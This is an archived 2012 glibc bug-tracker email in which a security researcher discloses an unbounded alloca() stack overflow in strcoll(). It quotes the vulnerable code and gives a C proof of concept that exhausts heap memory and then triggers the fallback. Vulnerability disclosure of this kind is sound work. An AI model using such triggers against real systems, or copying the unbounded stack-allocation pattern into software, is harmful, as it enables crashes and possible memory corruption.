This is the mail archive of the glibc-bugs@sourceware.org mailing list for the glibc project.

Index Nav:	[Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav:	[Date Prev] [Date Next]	[Thread Prev] [Thread Next]
Other format:	[Raw text]

[Bug libc/14547] strcoll integer / buffer overflow

From: "shaun.colley at ioactive dot com" <sourceware-bugzilla at sourceware dot org>
To: glibc-bugs at sources dot redhat dot com
Date: Tue, 11 Sep 2012 09:53:33 +0000
Subject: [Bug libc/14547] strcoll integer / buffer overflow
Auto-submitted: auto-generated
References: <bug-14547-131@http.sourceware.org/bugzilla/>

http://sourceware.org/bugzilla/show_bug.cgi?id=14547

--- Comment #4 from Shaun Colley <shaun.colley at ioactive dot com> 2012-09-11 09:53:33 UTC ---
I've detailed another strcoll() security vulnerability below, which is an
unbounded alloca() call.


alloca() stack overflow

If the malloc() call in alloca() fails (i.e. OOM conditions), strcoll() will
failsafe to alloca() for allocating its memory, which could result in unbounded
alloca() calls and exploitable
conditions if the stack pointer is shifted over the guard area and into the
heap. See vulnerable code below.


       if (idx1arr == NULL)
       /* No memory.  Well, go with the stack then.

          XXX Once this implementation is stable we will handle this
          differently.  Instead of precomputing the indeces we will
          do this in time.  This means, though, that this happens for
          every pass again.  */
          goto try_stack;
          use_malloc = 1;
       }
     else
       {
       try_stack:
         idx1arr = (int32_t *) alloca (s1len * sizeof (int32_t));
         idx2arr = (int32_t *) alloca (s2len * sizeof (int32_t));
         rule1arr = (unsigned char *) alloca (s1len);
         rule2arr = (unsigned char *) alloca (s2len);

[ ... ]


Here's my testcase / proof-of-concept for the issue.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <locale.h>

#define LEN 500000 

int main() {

char *ptr1 = malloc(LEN + 1);
char *ptr2 = malloc(LEN + 1);
char *wasted = NULL;
int i = 0, ret = 0;

if(!ptr1 || !ptr2) {
    printf("memory allocation failed\n");
    return -1;
}

memset(ptr1, 0x61, LEN);
memset(ptr2, 0x61, LEN); 

ptr1[LEN] = 0;
ptr2[LEN] = 0;

printf("strings allocated\n");

char *ptr = setlocale(LC_ALL, "en_US.UTF-8");
if(!ptr) {
    printf("error setting locale\n");
    return -1;
}

/* malloc() big chunks until we're out of memory */
do {    
wasted = malloc(1000000);
printf("%p\n", wasted);
i++;
} while(wasted);

ret = strcoll(ptr1, ptr2);

if(!ret) {
    printf("strings were lexicographically identical\n");
}

else {
    printf("strings were different\n");
}

return 0;
}



Cheers,
Shaun

-- 
Configure bugmail: http://sourceware.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.

References:
- [Bug libc/14547] New: strcoll integer / buffer overflow
  - From: jsm28 at gcc dot gnu.org

Index Nav:	[Date Index] [Subject Index] [Author Index] [Thread Index]
Message Nav:	[Date Prev] [Date Next]	[Thread Prev] [Thread Next]